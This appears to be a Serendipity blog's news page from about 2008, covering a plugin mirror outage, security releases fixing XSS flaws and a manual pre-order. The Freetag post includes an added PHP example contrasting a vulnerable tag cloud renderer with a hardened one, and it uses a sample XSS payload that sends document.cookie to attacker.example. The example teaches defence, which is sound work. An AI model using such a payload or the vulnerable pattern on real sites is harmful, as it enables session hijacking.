Netmirror.org Outage, Spartacus affected.
Posted by Garvin in Announcements, Development, Plugins at 16:33
As of today, the netmirror.org server seems to be having a hiccup. The Serendipity plugin Spartacus requires this server by default to provide automatic plugin and theme updates and downloads. While the server is unavailable, Spartacus requests can time out and new plugins cannot be installed.
The issue should resolve itself once netmirror.org is up again. In the meantime you can either reconfigure your Spartacus plugin to use the SourceForge mirrors, or disable the Spartacus plugin completely. Using the s9y.org mirror will not help, as that server currently hosts no files.
I will post an update once the server is up again. Sorry for the inconvenience.
Serendipity 1.3.1 released
Posted by Garvin in Announcements, Security at 10:37
Serendipity 1.3.1 has been released. This is a bugfix and security release, mainly addressing a potential XSS issue in the Top Referrers plugin as well as hypothetical XSS issues in the installer.
This release also addresses some basic problems with PostgreSQL 8 (8.3 removed several implicit type casts), which broke several Serendipity core features. The fix is only partial: breakage will still occur in some less common Serendipity functions. There is no complete solution, because implicit type casts are required for certain entryproperty operations. Maybe the PostgreSQL 8 team will consider whether implicit type casts are not also quite helpful. ;-)
The only new feature is a new Smarty function, {serendipity_getImageSize}.
This upgrade is recommended for users of the Top Referrers plugin and for new installations of Serendipity. Many thanks to Hanno Böck, once again, for reporting (and fixing) the two XSS issues (CVE-2008-1385 and CVE-2008-1386)!
You can find the new release on the s9y.org download page. Upgrade by simply uploading the extracted archive files to your webspace.
Serendipity 1.3 released (addresses security)
Posted by Garvin in Announcements, Development, Security at 10:11
Serendipity 1.3 has finally been released. The new release is mainly a feature consolidation release, but it also contains XSS security fixes:
- The karma rating plugin has been upgraded to support nice, CSS-based rating graphics (see this post), and its code has been overhauled.
- The Spartacus plugin can now use FTP upload, a workaround for PHP safe_mode restrictions. A remote backend for plugin update checks has also been added.
- Importers for phpNuke and lifetype have been added.
- Support for pingbacks has been improved a lot. Trackbacks can now be blocked based on sender IP checks.
- Better CSS styling for some internal plugins and for embedded images. The Remote-RSS plugin can now use Smarty templating.
- Increased Smarty templating features for the {serendipity_fetchPrintEntries} function, so that templates can check for entry properties.
- Support for SQLRelay has been added.
- Minor CSS and graphic updates to the Bulletproof template.
The full list of 41 changes in this release is documented in the NEWS file.
Regarding security, the bundled Smarty library has been updated to version 2.6.19, which addresses an issue in environments where PHP safe_mode is required. The new Serendipity release also contains tighter backend XSS checks, so that environments with untrusted authors can be more secure; many thanks to Hanno Böck for addressing this. Most importantly, an XSS issue in received trackbacks, discovered by Peter Hüwe, has been fixed.
The update is as easy as usual and recommended for all Serendipity users, especially if you do not regularly moderate or check your incoming trackbacks.
Upgrade pointers can be found in the FAQ; upgrading is as easy as uploading the new files.
Have fun!
Serendipity 1.3-beta1 released
Posted by Garvin in Announcements, Development at 11:53
Serendipity 1.3-beta1 has been released. This beta is considered a release candidate for the final 1.3 release, which is scheduled for the end of this month.
Freetag plugin updated to prevent XSS
Posted by Garvin in Announcements, Security at 14:49
The Freetag plugin has been updated to version 2.96 to fix a possible XSS in the tag cloud output.
An XSS attack lets an attacker inject foreign HTML or JavaScript that is displayed to visitors of the blog when they open a specially crafted URL. Because the injected script runs in the visitor's browser with access to the blog's cookies, this attack basically allows for cookie stealing.
Users of the Freetag plugin should upgrade to the latest version; upgrading via the Spartacus plugin or Spartacus.s9y.org is a matter of a few minutes. Thanks to Alex from Bitsploit.de for reporting this issue to us.
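The Freetag tag cloud bug above and the XSS in received trackbacks fixed in 1.3 are both the same class of defect: untrusted text (a tag name, a trackback title) written into HTML without encoding it for the context it lands in. The following is an added example, not the Freetag plugin's or Serendipity's own code: a minimal tag cloud renderer in a vulnerable and a hardened variant. The tag list and the attacker's payload are constructed sample input, and the "/plugin/tag/" link prefix is an assumption made for the example.

```php
<?php
// Added example (not Serendipity's or the Freetag plugin's code): a minimal
// tag cloud renderer in a vulnerable and a hardened variant. The tag list and
// the attacker's payload below are constructed sample input, and the
// "/plugin/tag/" link prefix is an assumption made for this example.

// Constructed (tag => post count) map. The last entry plays the attacker: a
// tag whose name carries markup, as it could arrive through a crafted URL or
// from an untrusted author.
$tags = [
    'php'      => 12,
    'security' => 7,
    '<script>document.location="http://attacker.example/?c="+document.cookie</script>' => 1,
];

// Vulnerable variant: the tag name is concatenated straight into the text
// node and into the href attribute. The <script> element survives intact and
// runs in every visitor's browser, shipping the session cookie to the attacker.
function tagcloud_vulnerable(array $tags): string
{
    $html = '';
    foreach ($tags as $tag => $count) {
        $size = 100 + 10 * (int) $count;
        $html .= '<a class="tag" style="font-size:' . $size . '%" href="/plugin/tag/' . $tag . '">'
               . $tag . '</a> ';
    }
    return $html;
}

// Hardened variant: each untrusted value is encoded for the context it lands
// in. htmlspecialchars() with ENT_QUOTES neutralises & < > " ' in text nodes
// and in quoted attributes; rawurlencode() first makes the tag safe as a URL
// path segment, so it cannot smuggle quotes or a "javascript:" scheme into the
// link. The count is cast to int and therefore needs no encoding.
function tagcloud_safe(array $tags): string
{
    $html = '';
    foreach ($tags as $tag => $count) {
        $size = 100 + 10 * (int) $count;
        $text = htmlspecialchars((string) $tag, ENT_QUOTES, 'UTF-8');
        $href = htmlspecialchars('/plugin/tag/' . rawurlencode((string) $tag), ENT_QUOTES, 'UTF-8');
        $html .= '<a class="tag" style="font-size:' . $size . '%" href="' . $href . '">'
               . $text . '</a> ';
    }
    return $html;
}

// Quick check used below: does a literal <script tag reach the page?
function contains_live_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

$vuln = tagcloud_vulnerable($tags);
$safe = tagcloud_safe($tags);

echo 'vulnerable output contains a live <script>: ' . (contains_live_script($vuln) ? 'yes' : 'no') . "\n";
echo 'hardened output contains a live <script>:   ' . (contains_live_script($safe) ? 'yes' : 'no') . "\n\n";
echo $safe . "\n";
```

Run it with `php tagcloud.php`: the vulnerable variant reports a live script element, the hardened one does not, and the printed hardened markup shows the payload reduced to harmless visible text (`&lt;script&gt;...`). The same two-step rule (encode for the URL, then encode for the HTML attribute or text node) is what a trackback renderer has to apply to the remote site's title, excerpt and URL before displaying them.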
German: Pre-order the Serendipity-Handbuch now
Posted by Garvin in Announcements at 13:57
(This post was written in German, as it is currently only relevant to German readers)

As you can now see in the left column of my blog, the official Serendipity manual (Serendipity-Handbuch) that I wrote has recently become available for pre-order.
Around 700 pages are currently with the publisher for proofreading and polishing, packed with detailed descriptions of everything that has to do with Serendipity.
A lot of heart and free time has gone into the book, and I very much hope it finally puts complete documentation into users' hands. It is equally intended for newcomers to the system, since every aspect of the system is described.
Pre-ordering now helps the book appear a little sooner - and gets it into your hands directly. The current publication date is targeted for May 2008. Pre-orders are accepted via Amazon, OpenSourcePress, and at any bookshop.